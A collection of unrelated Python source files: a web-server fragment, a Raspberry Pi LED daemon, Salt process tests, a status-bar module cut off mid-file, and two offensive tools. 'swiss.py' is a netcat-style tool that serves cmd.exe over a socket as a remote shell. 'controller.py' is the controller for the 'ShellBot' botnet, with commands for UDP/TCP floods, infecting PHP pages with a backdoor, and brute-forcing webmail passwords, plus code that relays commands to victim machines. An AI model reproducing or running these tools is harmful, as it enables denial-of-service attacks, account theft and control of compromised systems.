def health():
return 'OK'
def redirect_to_canonical_host():
request_url = urllib.parse.urlparse(request.url)
redirect_url = request_url
# Disable redirects on the health check endpoint.
if request_url.path == "/health":
return
# Handle hostname changes
if "canonical_url" in g.cfg["web"]:
canonical_url = urllib.parse.urlparse(g.cfg["web"]["canonical_url"])
redirect_url = redirect_url._replace(
scheme=canonical_url.scheme,
netloc=canonical_url.netloc,
)
# Handle path changes
for prefix in g.cfg["web"].get("remove_path_prefixes", []):
if redirect_url.path.startswith("/" + prefix + "/"):
new_path = redirect_url.path[len(prefix)+1:]
redirect_url = redirect_url._replace(path=new_path)
elif redirect_url.path == "/" + prefix:
redirect_url = redirect_url._replace(path="/")
if request_url != redirect_url:
redirect(urllib.parse.urlunparse(redirect_url), 301)
def start(cfg, states, queue_handler, repo_cfgs, repos, logger,
buildbot_slots, my_username, db, repo_labels, mergeable_que, gh):
env = jinja2.Environment(
loader=jinja2.FileSystemLoader(pkg_resources.resource_filename(__name__, 'html')), # noqa
autoescape=True,
)
env.globals["announcement"] = cfg["web"].get("announcement")
tpls = {}
tpls['index'] = env.get_template('index.html')
tpls['queue'] = env.get_template('queue.html')
tpls['build_res'] = env.get_template('build_res.html')
tpls['retry_log'] = env.get_template('retry_log.html')
g.cfg = cfg
g.states = states
g.queue_handler = queue_handler
g.repo_cfgs = repo_cfgs
g.repos = repos
g.logger = logger.getChild('server')
g.buildbot_slots = buildbot_slots
g.tpls = tpls
g.my_username = my_username
g.db = db
g.repo_labels = repo_labels
g.mergeable_que = mergeable_que
g.gh = gh
bottle.app().add_hook("before_request", redirect_to_canonical_host)
# Synchronize all PR data on startup
if cfg['web'].get('sync_on_start', False):
Thread(target=synch_all).start()
try:
run(host=cfg['web'].get('host', '0.0.0.0'),
port=cfg['web']['port'],
server='waitress')
except OSError as e:
print(e, file=sys.stderr)
os._exit(1)
|
led.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Signal states on a LED'''
import itertools
import logging
import os
import threading
import time
import RPi.GPIO as GPIO
logger = logging.getLogger('led')
CONFIG_DIR = os.getenv('XDG_CONFIG_HOME') or os.path.expanduser('~/.config')
CONFIG_FILES = [
'/etc/status-led.ini',
os.path.join(CONFIG_DIR, 'status-led.ini')
]
class LED:
"""Starts a background thread to show patterns with the LED."""
def __init__(self, channel):
self.animator = threading.Thread(target=self._animate)
self.channel = channel
self.iterator = None
self.running = False
self.state = None
self.sleep = 0
GPIO.setup(channel, GPIO.OUT)
self.pwm = GPIO.PWM(channel, 100)
def start(self):
self.pwm.start(0) # off by default
self.running = True
self.animator.start()
def stop(self):
self.running = False
self.animator.join()
self.pwm.stop()
GPIO.output(self.channel, GPIO.LOW)
def set_state(self, state):
self.state = state
def _animate(self):
# TODO(ensonic): refactor or add justification
# pylint: disable=too-many-branches
while self.running:
if self.state:
if self.state == 'on':
self.iterator = None
self.sleep = 0.0
self.pwm.ChangeDutyCycle(100)
elif self.state == 'off':
self.iterator = None
self.sleep = 0.0
self.pwm.ChangeDutyCycle(0)
elif self.state == 'blink':
self.iterator = itertools.cycle([0, 100])
self.sleep = 0.5
elif self.state == 'blink-3':
self.iterator = itertools.cycle([0, 100] * 3 + [0, 0])
self.sleep = 0.25
elif self.state == 'beacon':
self.iterator = itertools.cycle(
itertools.chain([30] * 100, [100] * 8, range(100, 30, -5)))
self.sleep = 0.05
elif self.state == 'beacon-dark':
self.iterator = itertools.cycle(
itertools.chain([0] * 100, range(0, 30, 3), range(30, 0, -3)))
self.sleep = 0.05
elif self.state == 'decay':
self.iterator = itertools.cycle(range(100, 0, -2))
self.sleep = 0.05
elif self.state == 'pulse-slow':
self.iterator = itertools.cycle(
itertools.chain(range(0, 100, 2), range(100, 0, -2)))
self.sleep = 0.1
elif self.state == 'pulse-quick':
self.iterator = itertools.cycle(
itertools.chain(range(0, 100, 5), range(100, 0, -5)))
self.sleep = 0.05
else:
logger.warning("unsupported state: %s", self.state)
self.state = None
if self.iterator:
self.pwm.ChangeDutyCycle(next(self.iterator))
time.sleep(self.sleep)
else:
time.sleep(1)
def main():
logging.basicConfig(
level=logging.INFO,
format="[%(asctime)s] %(levelname)s:%(name)s:%(message)s"
)
import configargparse
parser = configargparse.ArgParser(
default_config_files=CONFIG_FILES,
description="Status LED daemon")
parser.add_argument('-G', '--gpio-pin', default=25, type=int,
help='GPIO pin for the LED (default: 25)')
args = parser.parse_args()
led = None
state_map = {
"starting": "pulse-quick",
"ready": "beacon-dark",
"listening": "on",
"thinking": "pulse-quick",
"stopping": "pulse-quick",
"power-off": "off",
"error": "blink-3",
}
try:
GPIO.setmode(GPIO.BCM)
led = LED(args.gpio_pin)
led.start()
while True:
try:
state = input()
if not state:
continue
if state not in state_map:
logger.warning("unsupported state: %s, must be one of: %s",
state, ",".join(state_map.keys()))
continue
led.set_state(state_map[state])
except EOFError:
time.sleep(1)
except KeyboardInterrupt:
pass
finally:
led.stop()
GPIO.cleanup()
if __name__ == '__main__':
main()
|
test_process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import datetime
import functools
import io
import multiprocessing
import os
import signal
import sys
import threading
import time
import warnings
import psutil
# Import salt libs
import salt.utils.platform
import salt.utils.process
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import range # pylint: disable=import-error,redefined-builtin
from salt.utils.versions import warn_until_date
from tests.support.mock import patch
# Import Salt Testing libs
from tests.support.unit import TestCase, skipIf
def die(func):
"""
Add proc title
"""
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _die():
salt.utils.process.appendproctitle("test_{0}".format(name))
attrname = "die_" + name
setattr(self, attrname, _die)
self.addCleanup(delattr, self, attrname)
return wrapper
def incr(func):
"""
Increment counter
"""
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _incr(counter, num):
salt.utils.process.appendproctitle("test_{0}".format(name))
for _ in range(0, num):
counter.value += 1
attrname = "incr_" + name
setattr(self, attrname, _incr)
self.addCleanup(delattr, self, attrname)
return wrapper
def spin(func):
"""
Spin indefinitely
"""
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _spin():
salt.utils.process.appendproctitle("test_{0}".format(name))
while True:
time.sleep(1)
attrname = "spin_" + name
setattr(self, attrname, _spin)
self.addCleanup(delattr, self, attrname)
return wrapper
class TestProcessManager(TestCase):
@spin
def test_basic(self):
"""
Make sure that the process is alive 2s later
"""
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.spin_basic)
initial_pid = next(six.iterkeys(process_manager._process_map))
time.sleep(2)
process_manager.check_children()
try:
assert initial_pid == next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@spin
def test_kill(self):
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.spin_kill)
initial_pid = next(six.iterkeys(process_manager._process_map))
# kill the child
if salt.utils.platform.is_windows():
os.kill(initial_pid, signal.SIGTERM)
else:
os.kill(initial_pid, signal.SIGKILL)
# give the OS time to give the signal...
time.sleep(0.1)
process_manager.check_children()
try:
assert initial_pid != next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@die
def test_restarting(self):
"""
Make sure that the process is alive 2s later
"""
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.die_restarting)
initial_pid = next(six.iterkeys(process_manager._process_map))
time.sleep(2)
process_manager.check_children()
try:
assert initial_pid != next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@skipIf(sys.version_info < (2, 7), "Needs > Py 2.7 due to bug in stdlib")
@incr
def test_counter(self):
counter = multiprocessing.Value("i", 0)
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.incr_counter, args=(counter, 2))
time.sleep(1)
process_manager.check_children()
time.sleep(1)
# we should have had 2 processes go at it
try:
assert counter.value == 4
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
class TestThreadPool(TestCase):
def test_basic(self):
"""
Make sure the threadpool can do things
"""
def incr_counter(counter):
counter.value += 1
counter = multiprocessing.Value("i", 0)
pool = salt.utils.process.ThreadPool()
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertTrue(sent)
time.sleep(1) # Sleep to let the threads do things
self.assertEqual(counter.value, 1)
self.assertEqual(pool._job_queue.qsize(), 0)
def test_full_queue(self):
"""
Make sure that a full threadpool acts as we expect
"""
def incr_counter(counter):
counter.value += 1
counter = multiprocessing.Value("i", 0)
# Create a pool with no workers and 1 queue size
pool = salt.utils.process.ThreadPool(0, 1)
# make sure we can put the one item in
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertTrue(sent)
# make sure we can't put more in
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertFalse(sent)
time.sleep(1) # Sleep to let the threads do things
# make sure no one updated the counter
self.assertEqual(counter.value, 0)
# make sure the queue is still full
self.assertEqual(pool._job_queue.qsize(), 1)
class TestProcess(TestCase):
def test_daemonize_if(self):
# pylint: disable=assignment-from-none
with patch("sys.argv", ["salt-call"]):
ret = salt.utils.process.daemonize_if({})
self.assertEqual(None, ret)
ret = salt.utils.process.daemonize_if({"multiprocessing": False})
self.assertEqual(None, ret)
with patch("sys.platform", "win"):
ret = salt.utils.process.daemonize_if({})
self.assertEqual(None, ret)
with patch("salt.utils.process.daemonize"), patch("sys.platform", "linux2"):
salt.utils.process.daemonize_if({})
self.assertTrue(salt.utils.process.daemonize.called)
# pylint: enable=assignment-from-none
class TestProcessCallbacks(TestCase):
@staticmethod
def process_target(evt):
evt.set()
def test_callbacks(self):
"Validate Process call after fork and finalize methods"
teardown_to_mock = "salt.log.setup.shutdown_multiprocessing_logging"
log_to_mock = "salt.utils.process.Process._setup_process_logging"
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
evt = multiprocessing.Event()
proc = salt.utils.process.Process(target=self.process_target, args=(evt,))
proc.run()
assert evt.is_set()
mb.assert_called()
ma.assert_called()
def test_callbacks_called_when_run_overriden(self):
"Validate Process sub classes call after fork and finalize methods when run is overridden"
class MyProcess(salt.utils.process.Process):
def __init__(self):
super(MyProcess, self).__init__()
self.evt = multiprocessing.Event()
def run(self):
self.evt.set()
teardown_to_mock = "salt.log.setup.shutdown_multiprocessing_logging"
log_to_mock = "salt.utils.process.Process._setup_process_logging"
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
proc = MyProcess()
proc.run()
assert proc.evt.is_set()
ma.assert_called()
mb.assert_called()
class TestSignalHandlingProcess(TestCase):
@classmethod
def Process(cls, pid):
raise psutil.NoSuchProcess(pid)
@classmethod
def target(cls):
os.kill(os.getpid(), signal.SIGTERM)
@classmethod
def children(cls, *args, **kwargs):
raise psutil.NoSuchProcess(1)
def test_process_does_not_exist(self):
try:
with patch("psutil.Process", self.Process):
proc = salt.utils.process.SignalHandlingProcess(target=self.target)
proc.start()
except psutil.NoSuchProcess:
assert False, "psutil.NoSuchProcess raised"
def test_process_children_do_not_exist(self):
try:
with patch("psutil.Process.children", self.children):
proc = salt.utils.process.SignalHandlingProcess(target=self.target)
proc.start()
except psutil.NoSuchProcess:
assert False, "psutil.NoSuchProcess raised"
@staticmethod
def run_forever_sub_target(evt):
"Used by run_forever_target to create a sub-process"
while not evt.is_set():
time.sleep(1)
@staticmethod
def run_forever_target(sub_target, evt):
"A target that will run forever or until an event is set"
p = multiprocessing.Process(target=sub_target, args=(evt,))
p.start()
p.join()
@staticmethod
def kill_target_sub_proc():
pid = os.fork()
if pid == 0:
return
pid = os.fork()
if pid == 0:
return
time.sleep(0.1)
try:
os.kill(os.getpid(), signal.SIGINT)
except KeyboardInterrupt:
pass
@skipIf(sys.platform.startswith("win"), "No os.fork on Windows")
def test_signal_processing_regression_test(self):
evt = multiprocessing.Event()
sh_proc = salt.utils.process.SignalHandlingProcess(
target=self.run_forever_target, args=(self.run_forever_sub_target, evt)
)
sh_proc.start()
proc = multiprocessing.Process(target=self.kill_target_sub_proc)
proc.start()
proc.join()
# When the bug exists, the kill_target_sub_proc signal will kill both
# processes. sh_proc will be alive if the bug is fixed
try:
assert sh_proc.is_alive()
finally:
evt.set()
sh_proc.join()
@staticmethod
def no_op_target():
pass
@staticmethod
def pid_setting_target(sub_target, val, evt):
val.value = os.getpid()
p = multiprocessing.Process(target=sub_target, args=(evt,))
p.start()
p.join()
@skipIf(sys.platform.startswith("win"), "Required signals not supported on windows")
def test_signal_processing_handle_signals_called(self):
"Validate SignalHandlingProcess handles signals"
# Gloobal event to stop all processes we're creating
evt = multiprocessing.Event()
# Create a process to test signal handler
val = multiprocessing.Value("i", 0)
proc = salt.utils.process.SignalHandlingProcess(
target=self.pid_setting_target,
args=(self.run_forever_sub_target, val, evt),
)
proc.start()
# Create a second process that should not respond to SIGINT or SIGTERM
proc2 = multiprocessing.Process(
target=self.run_forever_target, args=(self.run_forever_sub_target, evt),
)
proc2.start()
# Wait for the sub process to set it's pid
while not val.value:
time.sleep(0.3)
assert not proc.signal_handled()
# Send a signal that should get handled by the subprocess
os.kill(val.value, signal.SIGTERM)
# wait up to 10 seconds for signal handler:
start = time.time()
while time.time() - start < 10:
if proc.signal_handled():
break
time.sleep(0.3)
try:
# Allow some time for the signal handler to do it's thing
assert proc.signal_handled()
# Reap the signaled process
proc.join(1)
assert proc2.is_alive()
finally:
evt.set()
proc2.join(30)
proc.join(30)
class TestSignalHandlingProcessCallbacks(TestCase):
@staticmethod
def process_target(evt):
evt.set()
def test_callbacks(self):
"Validate SignalHandlingProcess call after fork and finalize methods"
teardown_to_mock = "salt.log.setup.shutdown_multiprocessing_logging"
log_to_mock = "salt.utils.process.Process._setup_process_logging"
sig_to_mock = "salt.utils.process.SignalHandlingProcess._setup_signals"
# Mock _setup_signals so we do not register one for this process.
evt = multiprocessing.Event()
with patch(sig_to_mock):
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
sh_proc = salt.utils.process.SignalHandlingProcess(
target=self.process_target, args=(evt,)
)
sh_proc.run()
assert evt.is_set()
ma.assert_called()
mb.assert_called()
def test_callbacks_called_when_run_overriden(self):
"Validate SignalHandlingProcess sub classes call after fork and finalize methods when run is overridden"
class MyProcess(salt.utils.process.SignalHandlingProcess):
def __init__(self):
super(MyProcess, self).__init__()
self.evt = multiprocessing.Event()
def run(self):
self.evt.set()
teardown_to_mock = "salt.log.setup.shutdown_multiprocessing_logging"
log_to_mock = "salt.utils.process.Process._setup_process_logging"
sig_to_mock = "salt.utils.process.SignalHandlingProcess._setup_signals"
# Mock _setup_signals so we do not register one for this process.
with patch(sig_to_mock):
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
sh_proc = MyProcess()
sh_proc.run()
assert sh_proc.evt.is_set()
ma.assert_called()
mb.assert_called()
class TestDup2(TestCase):
def test_dup2_no_fileno(self):
"The dup2 method does not fail on streams without fileno support"
f1 = io.StringIO("some initial text data")
f2 = io.StringIO("some initial other text data")
with self.assertRaises(io.UnsupportedOperation):
f1.fileno()
with patch("os.dup2") as dup_mock:
try:
salt.utils.process.dup2(f1, f2)
except io.UnsupportedOperation:
assert False, "io.UnsupportedOperation was raised"
assert not dup_mock.called
def null_target():
pass
def event_target(event):
while True:
if event.wait(5):
break
class TestProcessList(TestCase):
@staticmethod
def wait_for_proc(proc, timeout=10):
start = time.time()
while proc.is_alive():
if time.time() - start > timeout:
raise Exception("Process did not finishe before timeout")
time.sleep(0.3)
def test_process_list_process(self):
plist = salt.utils.process.SubprocessList()
proc = multiprocessing.Process(target=null_target)
proc.start()
plist.add(proc)
assert proc in plist.processes
self.wait_for_proc(proc)
assert not proc.is_alive()
plist.cleanup()
assert proc not in plist.processes
def test_process_list_thread(self):
plist = salt.utils.process.SubprocessList()
thread = threading.Thread(target=null_target)
thread.start()
plist.add(thread)
assert thread in plist.processes
self.wait_for_proc(thread)
assert not thread.is_alive()
plist.cleanup()
assert thread not in plist.processes
def test_process_list_cleanup(self):
plist = salt.utils.process.SubprocessList()
event = multiprocessing.Event()
proc = multiprocessing.Process(target=event_target, args=[event])
proc.start()
plist.add(proc)
assert proc in plist.processes
plist.cleanup()
event.set()
assert proc in plist.processes
self.wait_for_proc(proc)
assert not proc.is_alive()
plist.cleanup()
assert proc not in plist.processes
class TestDeprecatedClassNames(TestCase):
@staticmethod
def process_target():
pass
@staticmethod
def patched_warn_until_date(current_date):
def _patched_warn_until_date(
date,
message,
category=DeprecationWarning,
stacklevel=None,
_current_date=current_date,
_dont_call_warnings=False,
):
# Because we add another function in between, the stacklevel
# set in salt.utils.process, 3, needs to now be 4
stacklevel = 4
return warn_until_date(
date,
message,
category=category,
stacklevel=stacklevel,
_current_date=_current_date,
_dont_call_warnings=_dont_call_warnings,
)
return _patched_warn_until_date
def test_multiprocessing_process_warning(self):
# We *always* want *all* warnings thrown on this module
warnings.filterwarnings("always", "", DeprecationWarning, __name__)
fake_utcnow = datetime.date(2021, 1, 1)
proc = None
try:
with patch(
"salt.utils.versions.warn_until_date",
self.patched_warn_until_date(fake_utcnow),
):
# Test warning
with warnings.catch_warnings(record=True) as recorded_warnings:
proc = salt.utils.process.MultiprocessingProcess(
target=self.process_target
)
self.assertEqual(
"Please stop using 'salt.utils.process.MultiprocessingProcess' "
"and instead use 'salt.utils.process.Process'. "
"'salt.utils.process.MultiprocessingProcess' will go away "
"after 2022-01-01.",
six.text_type(recorded_warnings[0].message),
)
finally:
if proc is not None:
del proc
def test_multiprocessing_process_runtime_error(self):
fake_utcnow = datetime.date(2022, 1, 1)
proc = None
try:
with patch(
"salt.utils.versions.warn_until_date",
self.patched_warn_until_date(fake_utcnow),
):
with self.assertRaisesRegex(
RuntimeError,
r"Please stop using 'salt.utils.process.MultiprocessingProcess' "
r"and instead use 'salt.utils.process.Process'. "
r"'salt.utils.process.MultiprocessingProcess' will go away "
r"after 2022-01-01. "
r"This warning\(now exception\) triggered on "
r"filename '(.*)test_process.py', line number ([\d]+), is "
r"supposed to be shown until ([\d-]+). Today is ([\d-]+). "
r"Please remove the warning.",
):
proc = salt.utils.process.MultiprocessingProcess(
target=self.process_target
)
finally:
if proc is not None:
del proc
def test_signal_handling_multiprocessing_process_warning(self):
# We *always* want *all* warnings thrown on this module
warnings.filterwarnings("always", "", DeprecationWarning, __name__)
fake_utcnow = datetime.date(2021, 1, 1)
proc = None
try:
with patch(
"salt.utils.versions.warn_until_date",
self.patched_warn_until_date(fake_utcnow),
):
# Test warning
with warnings.catch_warnings(record=True) as recorded_warnings:
proc = salt.utils.process.SignalHandlingMultiprocessingProcess(
target=self.process_target
)
self.assertEqual(
"Please stop using 'salt.utils.process.SignalHandlingMultiprocessingProcess' "
"and instead use 'salt.utils.process.SignalHandlingProcess'. "
"'salt.utils.process.SignalHandlingMultiprocessingProcess' will go away "
"after 2022-01-01.",
six.text_type(recorded_warnings[0].message),
)
finally:
if proc is not None:
del proc
def test_signal_handling_multiprocessing_process_runtime_error(self):
fake_utcnow = datetime.date(2022, 1, 1)
proc = None
try:
with patch(
"salt.utils.versions.warn_until_date",
self.patched_warn_until_date(fake_utcnow),
):
with self.assertRaisesRegex(
RuntimeError,
r"Please stop using 'salt.utils.process.SignalHandlingMultiprocessingProcess' "
r"and instead use 'salt.utils.process.SignalHandlingProcess'. "
r"'salt.utils.process.SignalHandlingMultiprocessingProcess' will go away "
r"after 2022-01-01. "
r"This warning\(now exception\) triggered on "
r"filename '(.*)test_process.py', line number ([\d]+), is "
r"supposed to be shown until ([\d-]+). Today is ([\d-]+). "
r"Please remove the warning.",
):
proc = salt.utils.process.SignalHandlingMultiprocessingProcess(
target=self.process_target
)
finally:
if proc is not None:
del proc
|
swiss.py
|
import socket,os,threading,sys
import subprocess as sub
def usage():
print("nc.py [target] [port] [-e destanation] {-h] [-l]")
if "-h" in sys.argv:
usage()
exit()
try:
target = sys.argv[1]
port = int(sys.argv[2])
except:
usage()
exit()
listen = ("-l" in sys.argv)
execute = False
if("-e" in sys.argv):
execute = True
try:
program = sys.argv[sys.argv.index("-e")+1]
except:
program = ["\\windows\\system32\\cmd.exe"]
def recieve_data(s, p):
#recieves data from client server or shell
global execute
while True:
data = ""
while "\n" not in data:
data = s.recv(1024).decode()
if(execute):
p.stdin.write(data.encode())
p.stdin.flush()
else:
print(data)
def send_data(s,p):
#sends data to server/client
global execute
while True:
if(execute):
data = ""
while "\n" not in data:
data += p.stdout.read(1).decode()
s.send(data.encode())
else:
s.send((input(">") + "\n").encode())
if(execute):
shell = sub.Popen(program, stdin=sub.PIPE, stderr=sub.STDOUT, stdout=sub.PIPE)
else:
shell = "none"
if(not listen):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,port))
except Exception as e:
s.close()
print(e)
else:
try:
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
print("Listening on {}".format((target,port)))
server.listen(3)
s, addr = server.accept()
print("Got connection: {}".format(addr))
except Exception as e:
server.close()
print(e)
#threads
thread1 = threading.Thread(target=recieve_data, args=(s,shell))
thread2 = threading.Thread(target=send_data, args=(s,shell))
thread1.start()
thread2.start()
|
controller.py
|
#!/usr/bin/env python3
# MIT License
##
# Copyright (c) 2017 Sayak Brahmachari
##
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
##
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
##
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import os
import sys
import socket
import re
import threading
about = r"""\
____ ____ ____ ____ ____ ____ ____ ____
||S |||h |||e |||l |||l |||B |||o |||t ||
||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
Coded by: Sayak Brahmachari
GitHub: https://github.com/sayak-brm
Website: http://mctrl.ml
"""
usage = "Usage: client.py <server ip> <server bridge port> <password>"
commands = """
Primary:
--------
refresh | Refresh connections
list | List connections
clear | Clear the console
quit | Close all connections and quit
about | Display program details
help | Show this message
Client Interaction:
-------------------
interact <id> | Interact with client
rawexec <command> | Execute a binary and pipe the raw I/O to the
controller. (Unstable)
stop | Stop interacting with client
udpflood <ip>:<port> | UDP flood with client
tcpflood <ip>:<port> | TCP flood with client
setbackdoor <web dir> | Infects all PHP Pages with Malicious Code that will
run the ShellBot Client (if killed) again. (Linux)
rmbackdoor <web dir> | Removes the Malicious PHP Code. (linux)
Note: Commands sent to clients must not contain semi-colons (;) except when
combining multiple lines or within quotes.
Wide Commands:
--------------
udpfloodall <ip>:<port> | Same as `udpflood` but for All clients
tcpfloodall <ip>:<port> | Same as `tcpflood` but for All clients
selfupdateall | Update all Clients with the new version from Github
Bruteforce:
-----------
gmailbruteforce <email>:<keys>:<min>:<max>
yahoobruteforce <email>:<keys>:<min>:<max>
livebruteforce <email>:<keys>:<min>:<max>
aolbruteforce <email>:<keys>:<min>:<max>
Example: gmailbruteforce someone@gmail.com:0123456789:6:8
custombruteforce <address>:<port>:<email>:<keys>:<min>:<max>
Example: custombruteforce smtp.example.com:587:user@example.com:abcdefghi:4:6
"""
# Helper Functions
def send_msg(sock, sem):
while True:
data = sys.stdin.readline()
if sem.acquire(False):
return
sock.send(bytes(data, 'utf-8'))
def recv_msg(sock):
while True:
data = sock.recv(20480).decode()
if data == 'stop':
sys.stdout.write("[Controller] - 'rawexec' finished\n")
return
sys.stdout.write(data)
def rawexec(s, command):
sem = threading.Semaphore()
sem.acquire(False)
s.send(bytes(command, 'utf-8'))
sender = threading.Thread(target=send_msg, args=(s, sem,))
recver = threading.Thread(target=recv_msg, args=(s,))
sender.daemon = True
recver.daemon = True
sender.start()
recver.start()
while threading.active_count() > 2:
pass
sem.release()
def process(s, command):
victimpath = ''
breakit = False
if command == "stop":
s.send(bytes("stop", 'utf-8'))
print("\n")
breakit = True
elif "rawexec" in command:
rawexec(s, command)
elif "cd " in command:
s.send(bytes(command, 'utf-8'))
temp = s.recv(20480).decode()
if "ERROR" not in temp:
victimpath = temp
else:
print(temp)
elif command == "":
print("[CONTROLLER] Nothing to be sent...\n")
else:
s.send(bytes(command, 'utf-8'))
print(s.recv(20480).decode())
return breakit, victimpath
def interact(s, command):
s.send(bytes(command, 'utf-8'))
temporary = s.recv(20480).decode()
if "ERROR" not in temporary:
victimpath = s.recv(20480).decode()
if "ERROR" not in victimpath:
breakit = False
while not breakit:
msg = input(victimpath)
allofem = re.split(''';(?=(?:[^'"]|'[^']*'|"[^"]*")*$)''', msg)
for onebyone in allofem:
breakit, path = process(s, onebyone)
if not path == '':
victimpath = path
else:
print(victimpath)
return
else:
print(temporary)
def run(s):
try:
while True:
command = input("SB> ")
if command.strip() is '': pass
elif command == "refresh":
s.send(bytes("refresh", 'utf-8'))
print(s.recv(20480).decode())
elif command == "list":
s.send(bytes("list", 'utf-8'))
print(s.recv(20480).decode())
elif "interact " in command:
interact(s, command)
elif "udpfloodall " in command or "tcpfloodall " in command:
s.send(bytes(command, 'utf-8'))
elif command == "selfupdateall":
s.send(bytes("selfupdateall", 'utf-8'))
elif command == "clear":
if sys.platform == 'win32':
os.system("cls")
else:
os.system("clear")
elif command == "quit":
s.send(bytes("quit", 'utf-8'))
s.close()
return
elif command == "help":
print(usage, commands)
elif command == "about":
print(about)
else:
print("[CONTROLLER] Invalid Command")
except KeyboardInterrupt:
try:
s.send(bytes("quit", 'utf-8'))
s.close()
except Exception:
pass
print("")
return
except Exception as ex:
print("[CONTROLLER] Connection Closed Due to Error:", ex)
s.close()
return
def main():
print(about)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
except Exception:
sys.exit("[ERROR] Can't connect to server")
s.send(bytes(password, 'utf-8'))
run(s)
if __name__ == "__main__":
if len(sys.argv) == 4:
host = sys.argv[1]
port = int(sys.argv[2])
password = sys.argv[3]
elif len(sys.argv) == 2 and sys.argv[1] in ['-h', '--help']:
print(usage, commands)
else:
# sys.exit(usage)
print(usage)
host = '127.0.0.1'
port = 9090
password = '1234'
print("Using default values - {}:{}, password:{}".format(host, port, password))
main()
|
scratchpad.py
|
# -*- coding: utf-8 -*-
"""
Display number of scratchpad windows and urgency hints.
Configuration parameters:
cache_timeout: refresh interval for i3-msg or swaymsg (default 5)
format: display format for this module
(default "\u232b [\?color=scratchpad {scratchpad}]")
thresholds: specify color thresholds to use
(default [(0, "darkgray"), (1, "violet")])
Format placeholders:
{scratchpad} number of scratchpads
{urgent} number of urgent scratchpads
Color thresholds:
xxx: print a color based on the value of `xxx` placeholder
Optional:
i3ipc: an improved python library to control i3wm and sway
Examples:
```
# hide zero scratchpad
scratchpad {
format = '[\?not_zero \u232b [\?color=scratchpad {scratchpad}]]'
}
# hide non-urgent scratchpad
scratchpad {
format = '[\?not_zero \u232b {urgent}]'
}
# bring up scratchpads on clicks
scratchpad {
on_click 1 = 'scratchpad show'
}
# add more colors
scratchpad {
thresholds = [
(0, "darkgray"), (1, "violet"), (2, "deepskyblue"), (3, "lime"),
(4, "yellow"), (5, "orange"), (6, "red"), (7, "tomato"),
]
}
```
@author shadowprince (counter), cornerman (async)
@license Eclipse Public License (counter), BSD (async)
SAMPLE OUTPUT
[{'full_text': '\u232b '}, {'full_text': u'0', 'color': '#a9a9a9'}]
violet
[{'full_text': '\u232b '}, {'full_text': u'5', 'color': '#ee82ee'}]
urgent
[{'full_text': '\u232b URGENT 1', 'urgent': True}]
"""
STRING_ERROR = "invalid ipc `{}`"
class Ipc:
"""
"""
def __init__(self, parent):
self.parent = parent
self.setup(parent)
class I3ipc(Ipc):
"""
i3ipc - an improved python library to control i3wm and sway
"""
def setup(self, parent):
from threading import Thread
self.parent.cache_timeout = self.parent.py3.CACHE_FOREVER
self.scratchpad_data = {"scratchpad": 0, "urgent": 0}
t = Thread(target=self.start)
t.daemon = True
t.start()
def start(self):
from i3ipc import Connection
